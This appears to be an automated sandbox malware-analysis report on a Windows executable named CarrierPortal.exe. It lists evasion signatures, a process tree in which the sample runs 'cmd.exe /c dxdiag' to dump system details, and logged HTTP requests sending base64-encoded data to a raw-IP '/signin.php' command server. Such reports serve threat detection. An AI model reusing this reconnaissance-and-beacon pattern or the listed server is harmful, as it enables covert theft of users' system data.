Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CarrierPortal.exe

Overview

General Information

Sample name:CarrierPortal.exe
Analysis ID:1584233
MD5:4c6d58378be4b9051debfb5670f5b82c
SHA1:851cc9c8753aa28ad94123e642b34d778d8fe30e
SHA256:19b883fd205513f2c8d7933a35ff86c63194312a75a6ff9a83a1c649b55603da
Infos:

Detection

Score:45
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Loading BitLocker PowerShell Module
Monitors registry run keys for changes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Query firmware table information (likely to detect VMs)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a global mouse hook
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64_ra
  • CarrierPortal.exe (PID: 3012 cmdline: "C:\Users\user\Desktop\CarrierPortal.exe" MD5: 4C6D58378BE4B9051DEBFB5670F5B82C)
    • cmd.exe (PID: 6904 cmdline: cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dxdiag.exe (PID: 6988 cmdline: dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt MD5: 19AB5AD061BF013EBD012D0682DF37E5)
  • mstee.sys (PID: 4 cmdline: MD5: 244C73253E165582DDC43AF4467D23DF)
  • mskssrv.sys (PID: 4 cmdline: MD5: 26854C1F5500455757BC00365CEF9483)
  • powershell.exe (PID: 3024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • CarrierPortal.exe (PID: 1092 cmdline: "C:\Users\user\Desktop\CarrierPortal.exe" MD5: 4C6D58378BE4B9051DEBFB5670F5B82C)
      • cmd.exe (PID: 4048 cmdline: cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • dxdiag.exe (PID: 1316 cmdline: dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt MD5: 19AB5AD061BF013EBD012D0682DF37E5)
  • Taskmgr.exe (PID: 6936 cmdline: "C:\Windows\system32\taskmgr.exe" /4 MD5: 58D5BC7895F7F32EE308E34F06F25DD5)
  • Taskmgr.exe (PID: 3920 cmdline: "C:\Windows\system32\taskmgr.exe" /4 MD5: 58D5BC7895F7F32EE308E34F06F25DD5)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Execution of Suspicious File Type Extension
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\mstee.sys, NewProcessName: C:\Windows\System32\drivers\mstee.sys, OriginalFileName: C:\Windows\System32\drivers\mstee.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: mstee.sys
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 3024, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: CarrierPortal.exeStatic PE information: certificate valid
Source: CarrierPortal.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BasicDisplay.pdb source: dxdiag.exe, 00000004.00000003.1198351485.000001D76470D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000003.1729056136.00000143D2092000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BasicDisplay.pdbUGP source: dxdiag.exe, 00000004.00000003.1198351485.000001D76470D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000003.1729056136.00000143D2092000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 162.243.76.72
Source: unknownTCP traffic detected without corresponding DNS query: 162.243.76.72
Source: unknownTCP traffic detected without corresponding DNS query: 162.243.76.72
Source: unknownTCP traffic detected without corresponding DNS query: 162.243.76.72
Source: unknownTCP traffic detected without corresponding DNS query: 162.243.76.72
Source: unknownTCP traffic detected without corresponding DNS query: 162.243.76.72
Source: unknownTCP traffic detected without corresponding DNS query: 162.243.76.72
Source: unknownTCP traffic detected without corresponding DNS query: 162.243.76.72
Source: unknownTCP traffic detected without corresponding DNS query: 162.243.76.72
Source: unknownTCP traffic detected without corresponding DNS query: 162.243.76.72
Source: global trafficHTTP traffic detected: GET /signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1ZUVDZsVk5HVlVaT1pVUmo5bVN5WWxVS3BHVkNKRVNTQkZlSFYyVk8xV1RYeDJNWmgzWnVGbVdrWlVaM2htVlNkRVp6a2xSS1pVWXJSMmFTcG1VeElWTnZkMVZZaDJNWmRGWnJaRk1PMW1VelFYVlVWRmJ3MFVUd2RWVXhFRE1SQnpaekVsYnhRRlVLUTBNbFEwTWxFRlZWWjBhTnB3VmtWa1l3QVhNVk5rV3VkRmNLVlVUb1JXUmlaRGJGTjFTNEpUV0l4R1ZsdG1Vd0ltYnhBVFYwRUVSVVpEYndRbVR3ZGxWNnhXUlNaa1Q2UlZjR0JUVFFCM1ZUQlRUd0VXTmo1MlZaQlhSaHRHWkZKV013WlZaREpsVmFsVk5GMVVZa1pVVHlzMmFTdG1RdWxGZEt4R1pyNUVWVTVXTUZabFFrZGxWSkIzYWtwa1VWZDFkM0JqVkxKRVNhUmtSd0ltVFNaVlV4RURNUk5EWlhWVmRhWjBZcFJXVlY1V01GWmxjazVHVkZabFJqcGtUd29GTjVVa1ZDSkVWVVJsVnExa1c0ZDFUMUFYTVdSRGVYZFZXMVVrWU5CM1ZTRkRNRlpsU2s1R1Z3SkVSbDlrVVZGVmV6VlZWM0ZUVlhobFZxSjJha3htVTFCblJXWkhadFZGV1dwbVlwUldSaVpqUnlFbFE1Y2xWMHBGYmloR1pXOVVNc0ZqVnpRMlZXbFhXRzEwYWtWa1l4QUhibFpIWnRWRldXcG1ZcFJXUmlaalJ5RWxjMFZsVkpCM2FrcGxTcVpsTk8xV1QxczJNVUJuU3JOVmExMFdWenBrTVI5bVR4TUZWS1ZrVXA1a2FUTkhkckoxVTFBelVWeEdNYUpsUnFGMVZzVmtVYXBFVlVWa1J3b2xVT1ZWVTFnM2FoSkZaWU5sUlNkMVVzeDJWUlpYTndFMVFTVmxWSHBGYmx4a1R4UW1iYTFXWUtaRldVWmtVWE5GYmtkMFlQQlhNV2hYV3prVmQwMW1US0pGTWFSVE9GWjFTMVVWVndwRU1WSmxWRzFFVEd4V1RIeG1iWFJrU1ZSbVdrWlZUemxUVmhOVU5WbEZXMVVWWnA1a2FVSkRjc0ptVWtkVlYwcDFhbGhHWldSbGJLRmpVekIzTVpoRWFJRkdiT3hXVURCWE1TZEVaSXBGU2FaVlpFUlhiVWhYVHRKMlM0MVdXMVpVTWFWRlpXOWtjd1prVjJSMlZVVkZiRjVrVE90V1V3c1dSU1pFWllSVmNHRmpXTUpWVlVWRGJ3STFTQ2hrV0VSbk1heGtVVmQxZE5aMFUySjBNUjVXTVVCbENFTlRKRU5USlJkVmVaQnpZb3BsUlBaVE1yRm1RV3BHVkZCSGJhNWtVV05sZTN0V1lDWkZXVVJrVUVWR2JzVm5i HTTP/1.1User-Agent: Java/23.0.1Host: 162.243.76.72Accept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1ZUVDZsVk5HVlVaT1pVUmo5bVN5WWxVS3BHVkNKRVNTQkZlSFYyVk8xV1RYeDJNWmgzWnVGbVdrWlVaM2htVlNkRVp6a2xSS1pVWXJSMmFTcG1VeElWTnZkMVZZaDJNWmRGWnJaRk1PMW1VelFYVlVWRmJ3MFVUd2RWVXhFRE1SQnpaekVsYnhRRlVLUTBNbFEwTWxFRlZWWlVWbHB3VmtWa1l3QVhNVk5rV3VkRmNLVlVUb1JXUmlaRGJGTjFTNEpUV0l4R1ZsdG1Vd0ltYnhBVFYwRUVSVVpEYndRbVR3ZGxWNnhXUlNaa1Q2UlZjR1ZrVFFCM1ZUUmpUd0VXTmo1MlZaQlhSaHRHWkZKV013WlZaREpsVmFsVk5GMVVZa1pVVHlzMmFTdG1RdWxGZEt4R1pyNUVWVTVXTUZabFFrZGxWSkIzYWtwa1VWZDFkM0JqVkxKRVNhUmtSd0ltVFNaVlV4RURNUk5EWlhWVmRhWjBZcFJXVlY1V01GWmxjazVHVkZabFJqcGtUd29GTjVVa1ZDSkVWVVJsVnExa1c0ZDFUMUFYTVdSRGVYZFZXMVVrWU5CM1ZTRkRNRlpsU2s1R1Z3SkVSbDlrVVZGVmV6VlZWM0ZUVlhobFZxSjJha3htVTFCblJXWkhadFZGV1dwbVlwUldSaVpqUnlFbFE1Y2xWMHBGYmloR1pXOVVNc0ZqVnpRMlZXbFhXRzEwYWtWa1l4QUhibFpIWnRWRldXcG1ZcFJXUmlaalJ5RWxjMFZsVkpCM2FrcGxTcVpsTk8xV1QxczJNVUJuU3JOVmExMFdWenBrTVI5bVR4TUZWS1ZrVXA1a2FUTkhkckoxVTFBelVWeEdNYUpsUnFGMVZzVmtVYXBFVlVWa1J3b2xVT1ZWVTFnM2FoSkZaWU5sUlNkMVVzeDJWUlpYTndFMVFTVmxWSHBGYmx4a1R4UW1iYTFXWUtaRldVWmtVWE5GYmtkMFlQQlhNV2hYV3prVmQwMW1US0pGTWFSVE9GWjFTMVVWVndwRU1WSmxWRzFFVEd4V1RIeG1iWFJrU1ZSbVdrWlZUemxUVmhOVU5WbEZXMVVWWnA1a2FVSkRjc0ptVWtkVlYwcDFhbGhHWldSbGJLRmpVekIzTVpoRWFJRkdiT3hXVURCWE1TZEVaSXBGU2FaVlpFUlhiVWhYVHRKMlM0MVdXMVpVTWFWRlpXOWtjd1prVjJSMlZVVkZiRjVrVE90V1V3c1dSU1pFWllSVmNHRmpXTUpWVlVWRGJ3STFTQ2hrV0VSbk1heGtVVmQxZE5aMFUySjBNUjVXTVVCbENFTlRKRU5USlJkVmVaQnpZb3BsUlBaVE1yRm1RV3BHVkZCSGJhNWtVV05sZTN0V1lDWkZXVVJrVUVWR2JzVm5i HTTP/1.1User-Agent: Java/23.0.1Host: 162.243.76.72Accept: */*Connection: keep-alive
Source: CarrierPortal.exe, CarrierPortal.exe, 00000012.00000002.1830734275.000001E77811D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://162.243.76.72/signin.php
Source: CarrierPortal.exe, 00000012.00000002.1830734275.000001E77811D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://162.243.76.72/signin.php?
Source: CarrierPortal.exeString found in binary or memory: http://162.243.76.72/signin.php?form=form&post=
Source: CarrierPortal.exe, 00000012.00000002.1830734275.000001E77811D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://162.243.76.72/signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1Z
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html)_
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.htmlax
Source: CarrierPortal.exeString found in binary or memory: http://crl.certigna.fr/certignarootca.crl
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: CarrierPortal.exeString found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: CarrierPortal.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CarrierPortal.exeString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crllW
Source: CarrierPortal.exeString found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl;_
Source: CarrierPortal.exeString found in binary or memory: http://crl.securetrust.com/STCA.crlE
Source: CarrierPortal.exeString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micros
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c7H
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.co
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mtH
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://policy.camerfirma.com
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://policy.camerfirma.com0
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://policy.camerfirma.com3b
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://repository.swisssign.com/
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://repository.swisssign.com/0
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://repository.swisssign.com/YF
Source: CarrierPortal.exeString found in binary or memory: http://www.chambersign.org
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.chambersign.org1
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.quovadis.bm
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.quovadis.bmB
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: CarrierPortal.exeString found in binary or memory: https://ocsp.quovadisoffshore.com
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com(
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: CarrierPortal.exeString found in binary or memory: https://ocsp.quovadisoffshore.com9
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://repository.luxtrust.lu
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://repository.luxtrust.lu#
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://repository.luxtrust.lu0
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://repository.luxtrust.luYa
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://repository.luxtrust.luc
Source: CarrierPortal.exeString found in binary or memory: https://www.graalvm.org/
Source: CarrierPortal.exeString found in binary or memory: https://www.graalvm.org/dev/reference-manual/native-image/dynamic-features/CertificateManagement/#ru
Source: CarrierPortal.exeString found in binary or memory: https://www.graalvm.org/latest/reference-manual/native-image/metadata/#
Source: CarrierPortal.exeString found in binary or memory: https://www.graalvm.org/latest/reference-manual/native-image/metadata/#g
Source: CarrierPortal.exeString found in binary or memory: https://www.graalvm.org/latest/reference-manual/native-image/metadata/#resources-and-resource-bundle
Source: CarrierPortal.exeString found in binary or memory: https://www.graalvm.org/latest/reference-manual/native-image/metadata/#serialization
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: C:\Windows\System32\dxdiag.exeWindows user hook set: 0 mouse low level C:\Windows\system32\dinput8.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 0_2_00000146244C9B2A0_2_00000146244C9B2A
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 0_2_00000146250217380_2_0000014625021738
Source: unknownDriver loaded: C:\Windows\System32\drivers\mstee.sys
Source: CarrierPortal.exeBinary string: Permission deniedBindExceptionAddress already in useCannot assign requested addressAddress family not supported by protocol familyOperation already in progressSoftware caused connection abortConnectExceptionConnection refusedConnection reset by peerDestination address requiredBad addressHost is downNoRouteToHostExceptionNo route to hostOperation now in progressInterrupted function callInvalid argumentSocket is already connectedToo many open filesThe message is larger than the maximum supported by the underlying transportNetwork is downNetwork dropped connection on resetNetwork is unreachableNo buffer space available (maximum connections reached?)Bad protocol optionSocket is not connectedSocket operation on nonsocketOperation not supportedProtocol family not supportedToo many processesProtocol not supportedProtocol wrong type for socketCannot send after socket shutdownSocket type not supportedConnection timed outClass type not foundResource temporarily unavailableHost not foundInsufficient memory availableSuccessful WSAStartup not yet performedValid name, no data record of requested typeThis is a nonrecoverable errorNetwork subsystem is unavailableNonauthoritative host not foundWinsock.dll version out of rangeGraceful shutdown in progressOverlapped operation abortedno further information%s: %sUnrecognized Windows Sockets error: %d: %sSocketExceptionjava/net/%s%sProtocol family unavailablejava/net/Proxy(Ljava/net/Proxy$Type;Ljava/net/SocketAddress;)Vjava/net/Proxy$TypeLjava/net/Proxy$Type;HTTPSOCKSLjava/net/Proxy;NO_PROXYjava/net/InetSocketAddress(Ljava/lang/String;I)Ljava/net/InetSocketAddress;createUnresolvedunsupported socket optionjava/lang/UnsupportedOperationExceptionset option IP_DONTFRAGMENT failedget option IP_DONTFRAGMENT failedset option TCP_KEEPCNT failedget option TCP_KEEPCNT failedset option TCP_KEEPIDLE failedget option TCP_KEEPIDLE failedset option TCP_KEEPINTVL failedget option TCP_KEEPINTVL failedconnectjava/net/PortUnreachableExceptionrecvfromWSASend failedInvalid handleRead failedSeek failedWrite failedSetFilePointerEx failedSize failedDirectIO setup failedjava/io/FileDescriptorfdhandleRead/write failedioctlsocketrecv failedsend failed(Ljava/net/InetAddress;I)VsocketfastLoopbackbindlistenAccept failedgetsocknamegetsockoptsetsocketoptshutdownselectConnection resetsun/net/ConnectionResetExceptionSocket close failedUnix domain path not presentUnix domain path too longWSASocketWepoll_create1 failedepoll_wait failed(I)Vsun/nio/fs/WindowsExceptionsun/nio/fs/WindowsNativeDispatcher$FirstFileattributessun/nio/fs/WindowsNativeDispatcher$FirstStreamsun/nio/fs/WindowsNativeDispatcher$VolumeInformationfileSystemNamevolumeNamevolumeSerialNumberflagssun/nio/fs/WindowsNativeDispatcher$DiskFreeSpacefreeBytesAvailabletotalNumberOfBytestotalNumberOfFreeBytesbytesPerSectorsun/nio/fs/WindowsNativeDispatcher$Accountdomainusesun/nio/fs/WindowsNativeDispatcher$AclInformationaceCountsun/nio/fs/WindowsNativeDispatcher$CompletionStatuserrorbytesTransferr
Source: classification engineClassification label: mal45.evad.winEXE@17/17@0/1
Source: C:\Users\user\Desktop\CarrierPortal.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\83aa4cc77f591dfc2374580bbd95f6ba_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\Taskmgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\TM.750ce7b0-e5fd-454f-9fad-2f66513dfa1b
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_762381681
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6884:120:WilError_03
Source: C:\Users\user\Desktop\CarrierPortal.exeFile created: C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txtJump to behavior
Source: CarrierPortal.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\dxdiag.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: CarrierPortal.exeString found in binary or memory: cn=chambers of commerce root - 2008,o=ac camerfirma s.a.,2.5.4.5=#1309413832373433323837,l=madrid (see current address at www.camerfirma.com/address),c=eu
Source: CarrierPortal.exeString found in binary or memory: cn=global chambersign root - 2008,o=ac camerfirma s.a.,2.5.4.5=#1309413832373433323837,l=madrid (see current address at www.camerfirma.com/address),c=eui
Source: CarrierPortal.exeString found in binary or memory: <K:Ljava/lang/Object;>Ljdk/internal/loader/AbstractClassLoaderValue<Ljdk/internal/loader/AbstractClassLoaderValue<TCLV;TV;>.Sub<TK;>;TV;>;
Source: CarrierPortal.exeString found in binary or memory: <CLV:Ljdk/internal/loader/AbstractClassLoaderValue<TCLV;TV;>;V:Ljava/lang/Object;>Ljava/lang/Object;Ljava/util/function/Supplier<TV;>;
Source: CarrierPortal.exeString found in binary or memory: <V:Ljava/lang/Object;>Ljdk/internal/loader/AbstractClassLoaderValue<Ljdk/internal/loader/ClassLoaderValue<TV;>;TV;>;
Source: CarrierPortal.exeString found in binary or memory: t<V:Ljava/lang/Object;>Ljdk/internal/loader/AbstractClassLoaderValue<Ljdk/internal/loader/ClassLoaderValue<TV;>;TV;>;
Source: CarrierPortal.exeString found in binary or memory: Use '-XX:-InstallSegfaultHandler' to disable the segfault handler at run time and create a core dump instead.
Source: CarrierPortal.exeString found in binary or memory: nUse '-XX:-InstallSegfaultHandler' to disable the segfault handler at run time and create a core dump instead.
Source: CarrierPortal.exeString found in binary or memory: <CLV:Ljdk/internal/loader/AbstractClassLoaderValue<TCLV;TV;>;V:Ljava/lang/Object;>Ljava/lang/Object;
Source: CarrierPortal.exeString found in binary or memory: d<CLV:Ljdk/internal/loader/AbstractClassLoaderValue<TCLV;TV;>;V:Ljava/lang/Object;>Ljava/lang/Object;
Source: CarrierPortal.exeString found in binary or memory: Rebuild with '-R:-InstallSegfaultHandler' to disable the handler permanently at build time.
Source: CarrierPortal.exeString found in binary or memory: [Rebuild with '-R:-InstallSegfaultHandler' to disable the handler permanently at build time.b
Source: CarrierPortal.exeString found in binary or memory: l=madrid (see current address at www.camerfirma.com/address)!wSup
Source: CarrierPortal.exeString found in binary or memory: <l=madrid (see current address at www.camerfirma.com/address)!wSup
Source: CarrierPortal.exeString found in binary or memory: l=madrid (see current address at www.camerfirma.com/address)
Source: CarrierPortal.exeString found in binary or memory: <l=madrid (see current address at www.camerfirma.com/address)
Source: CarrierPortal.exeString found in binary or memory: Ljdk/internal/loader/BootLoader;
Source: CarrierPortal.exeString found in binary or memory: Ljdk/internal/loader/BootLoader;
Source: CarrierPortal.exeString found in binary or memory: Africa/Addis_Ababa
Source: CarrierPortal.exeString found in binary or memory: Africa/Addis_Ababa,v
Source: unknownProcess created: C:\Users\user\Desktop\CarrierPortal.exe "C:\Users\user\Desktop\CarrierPortal.exe"
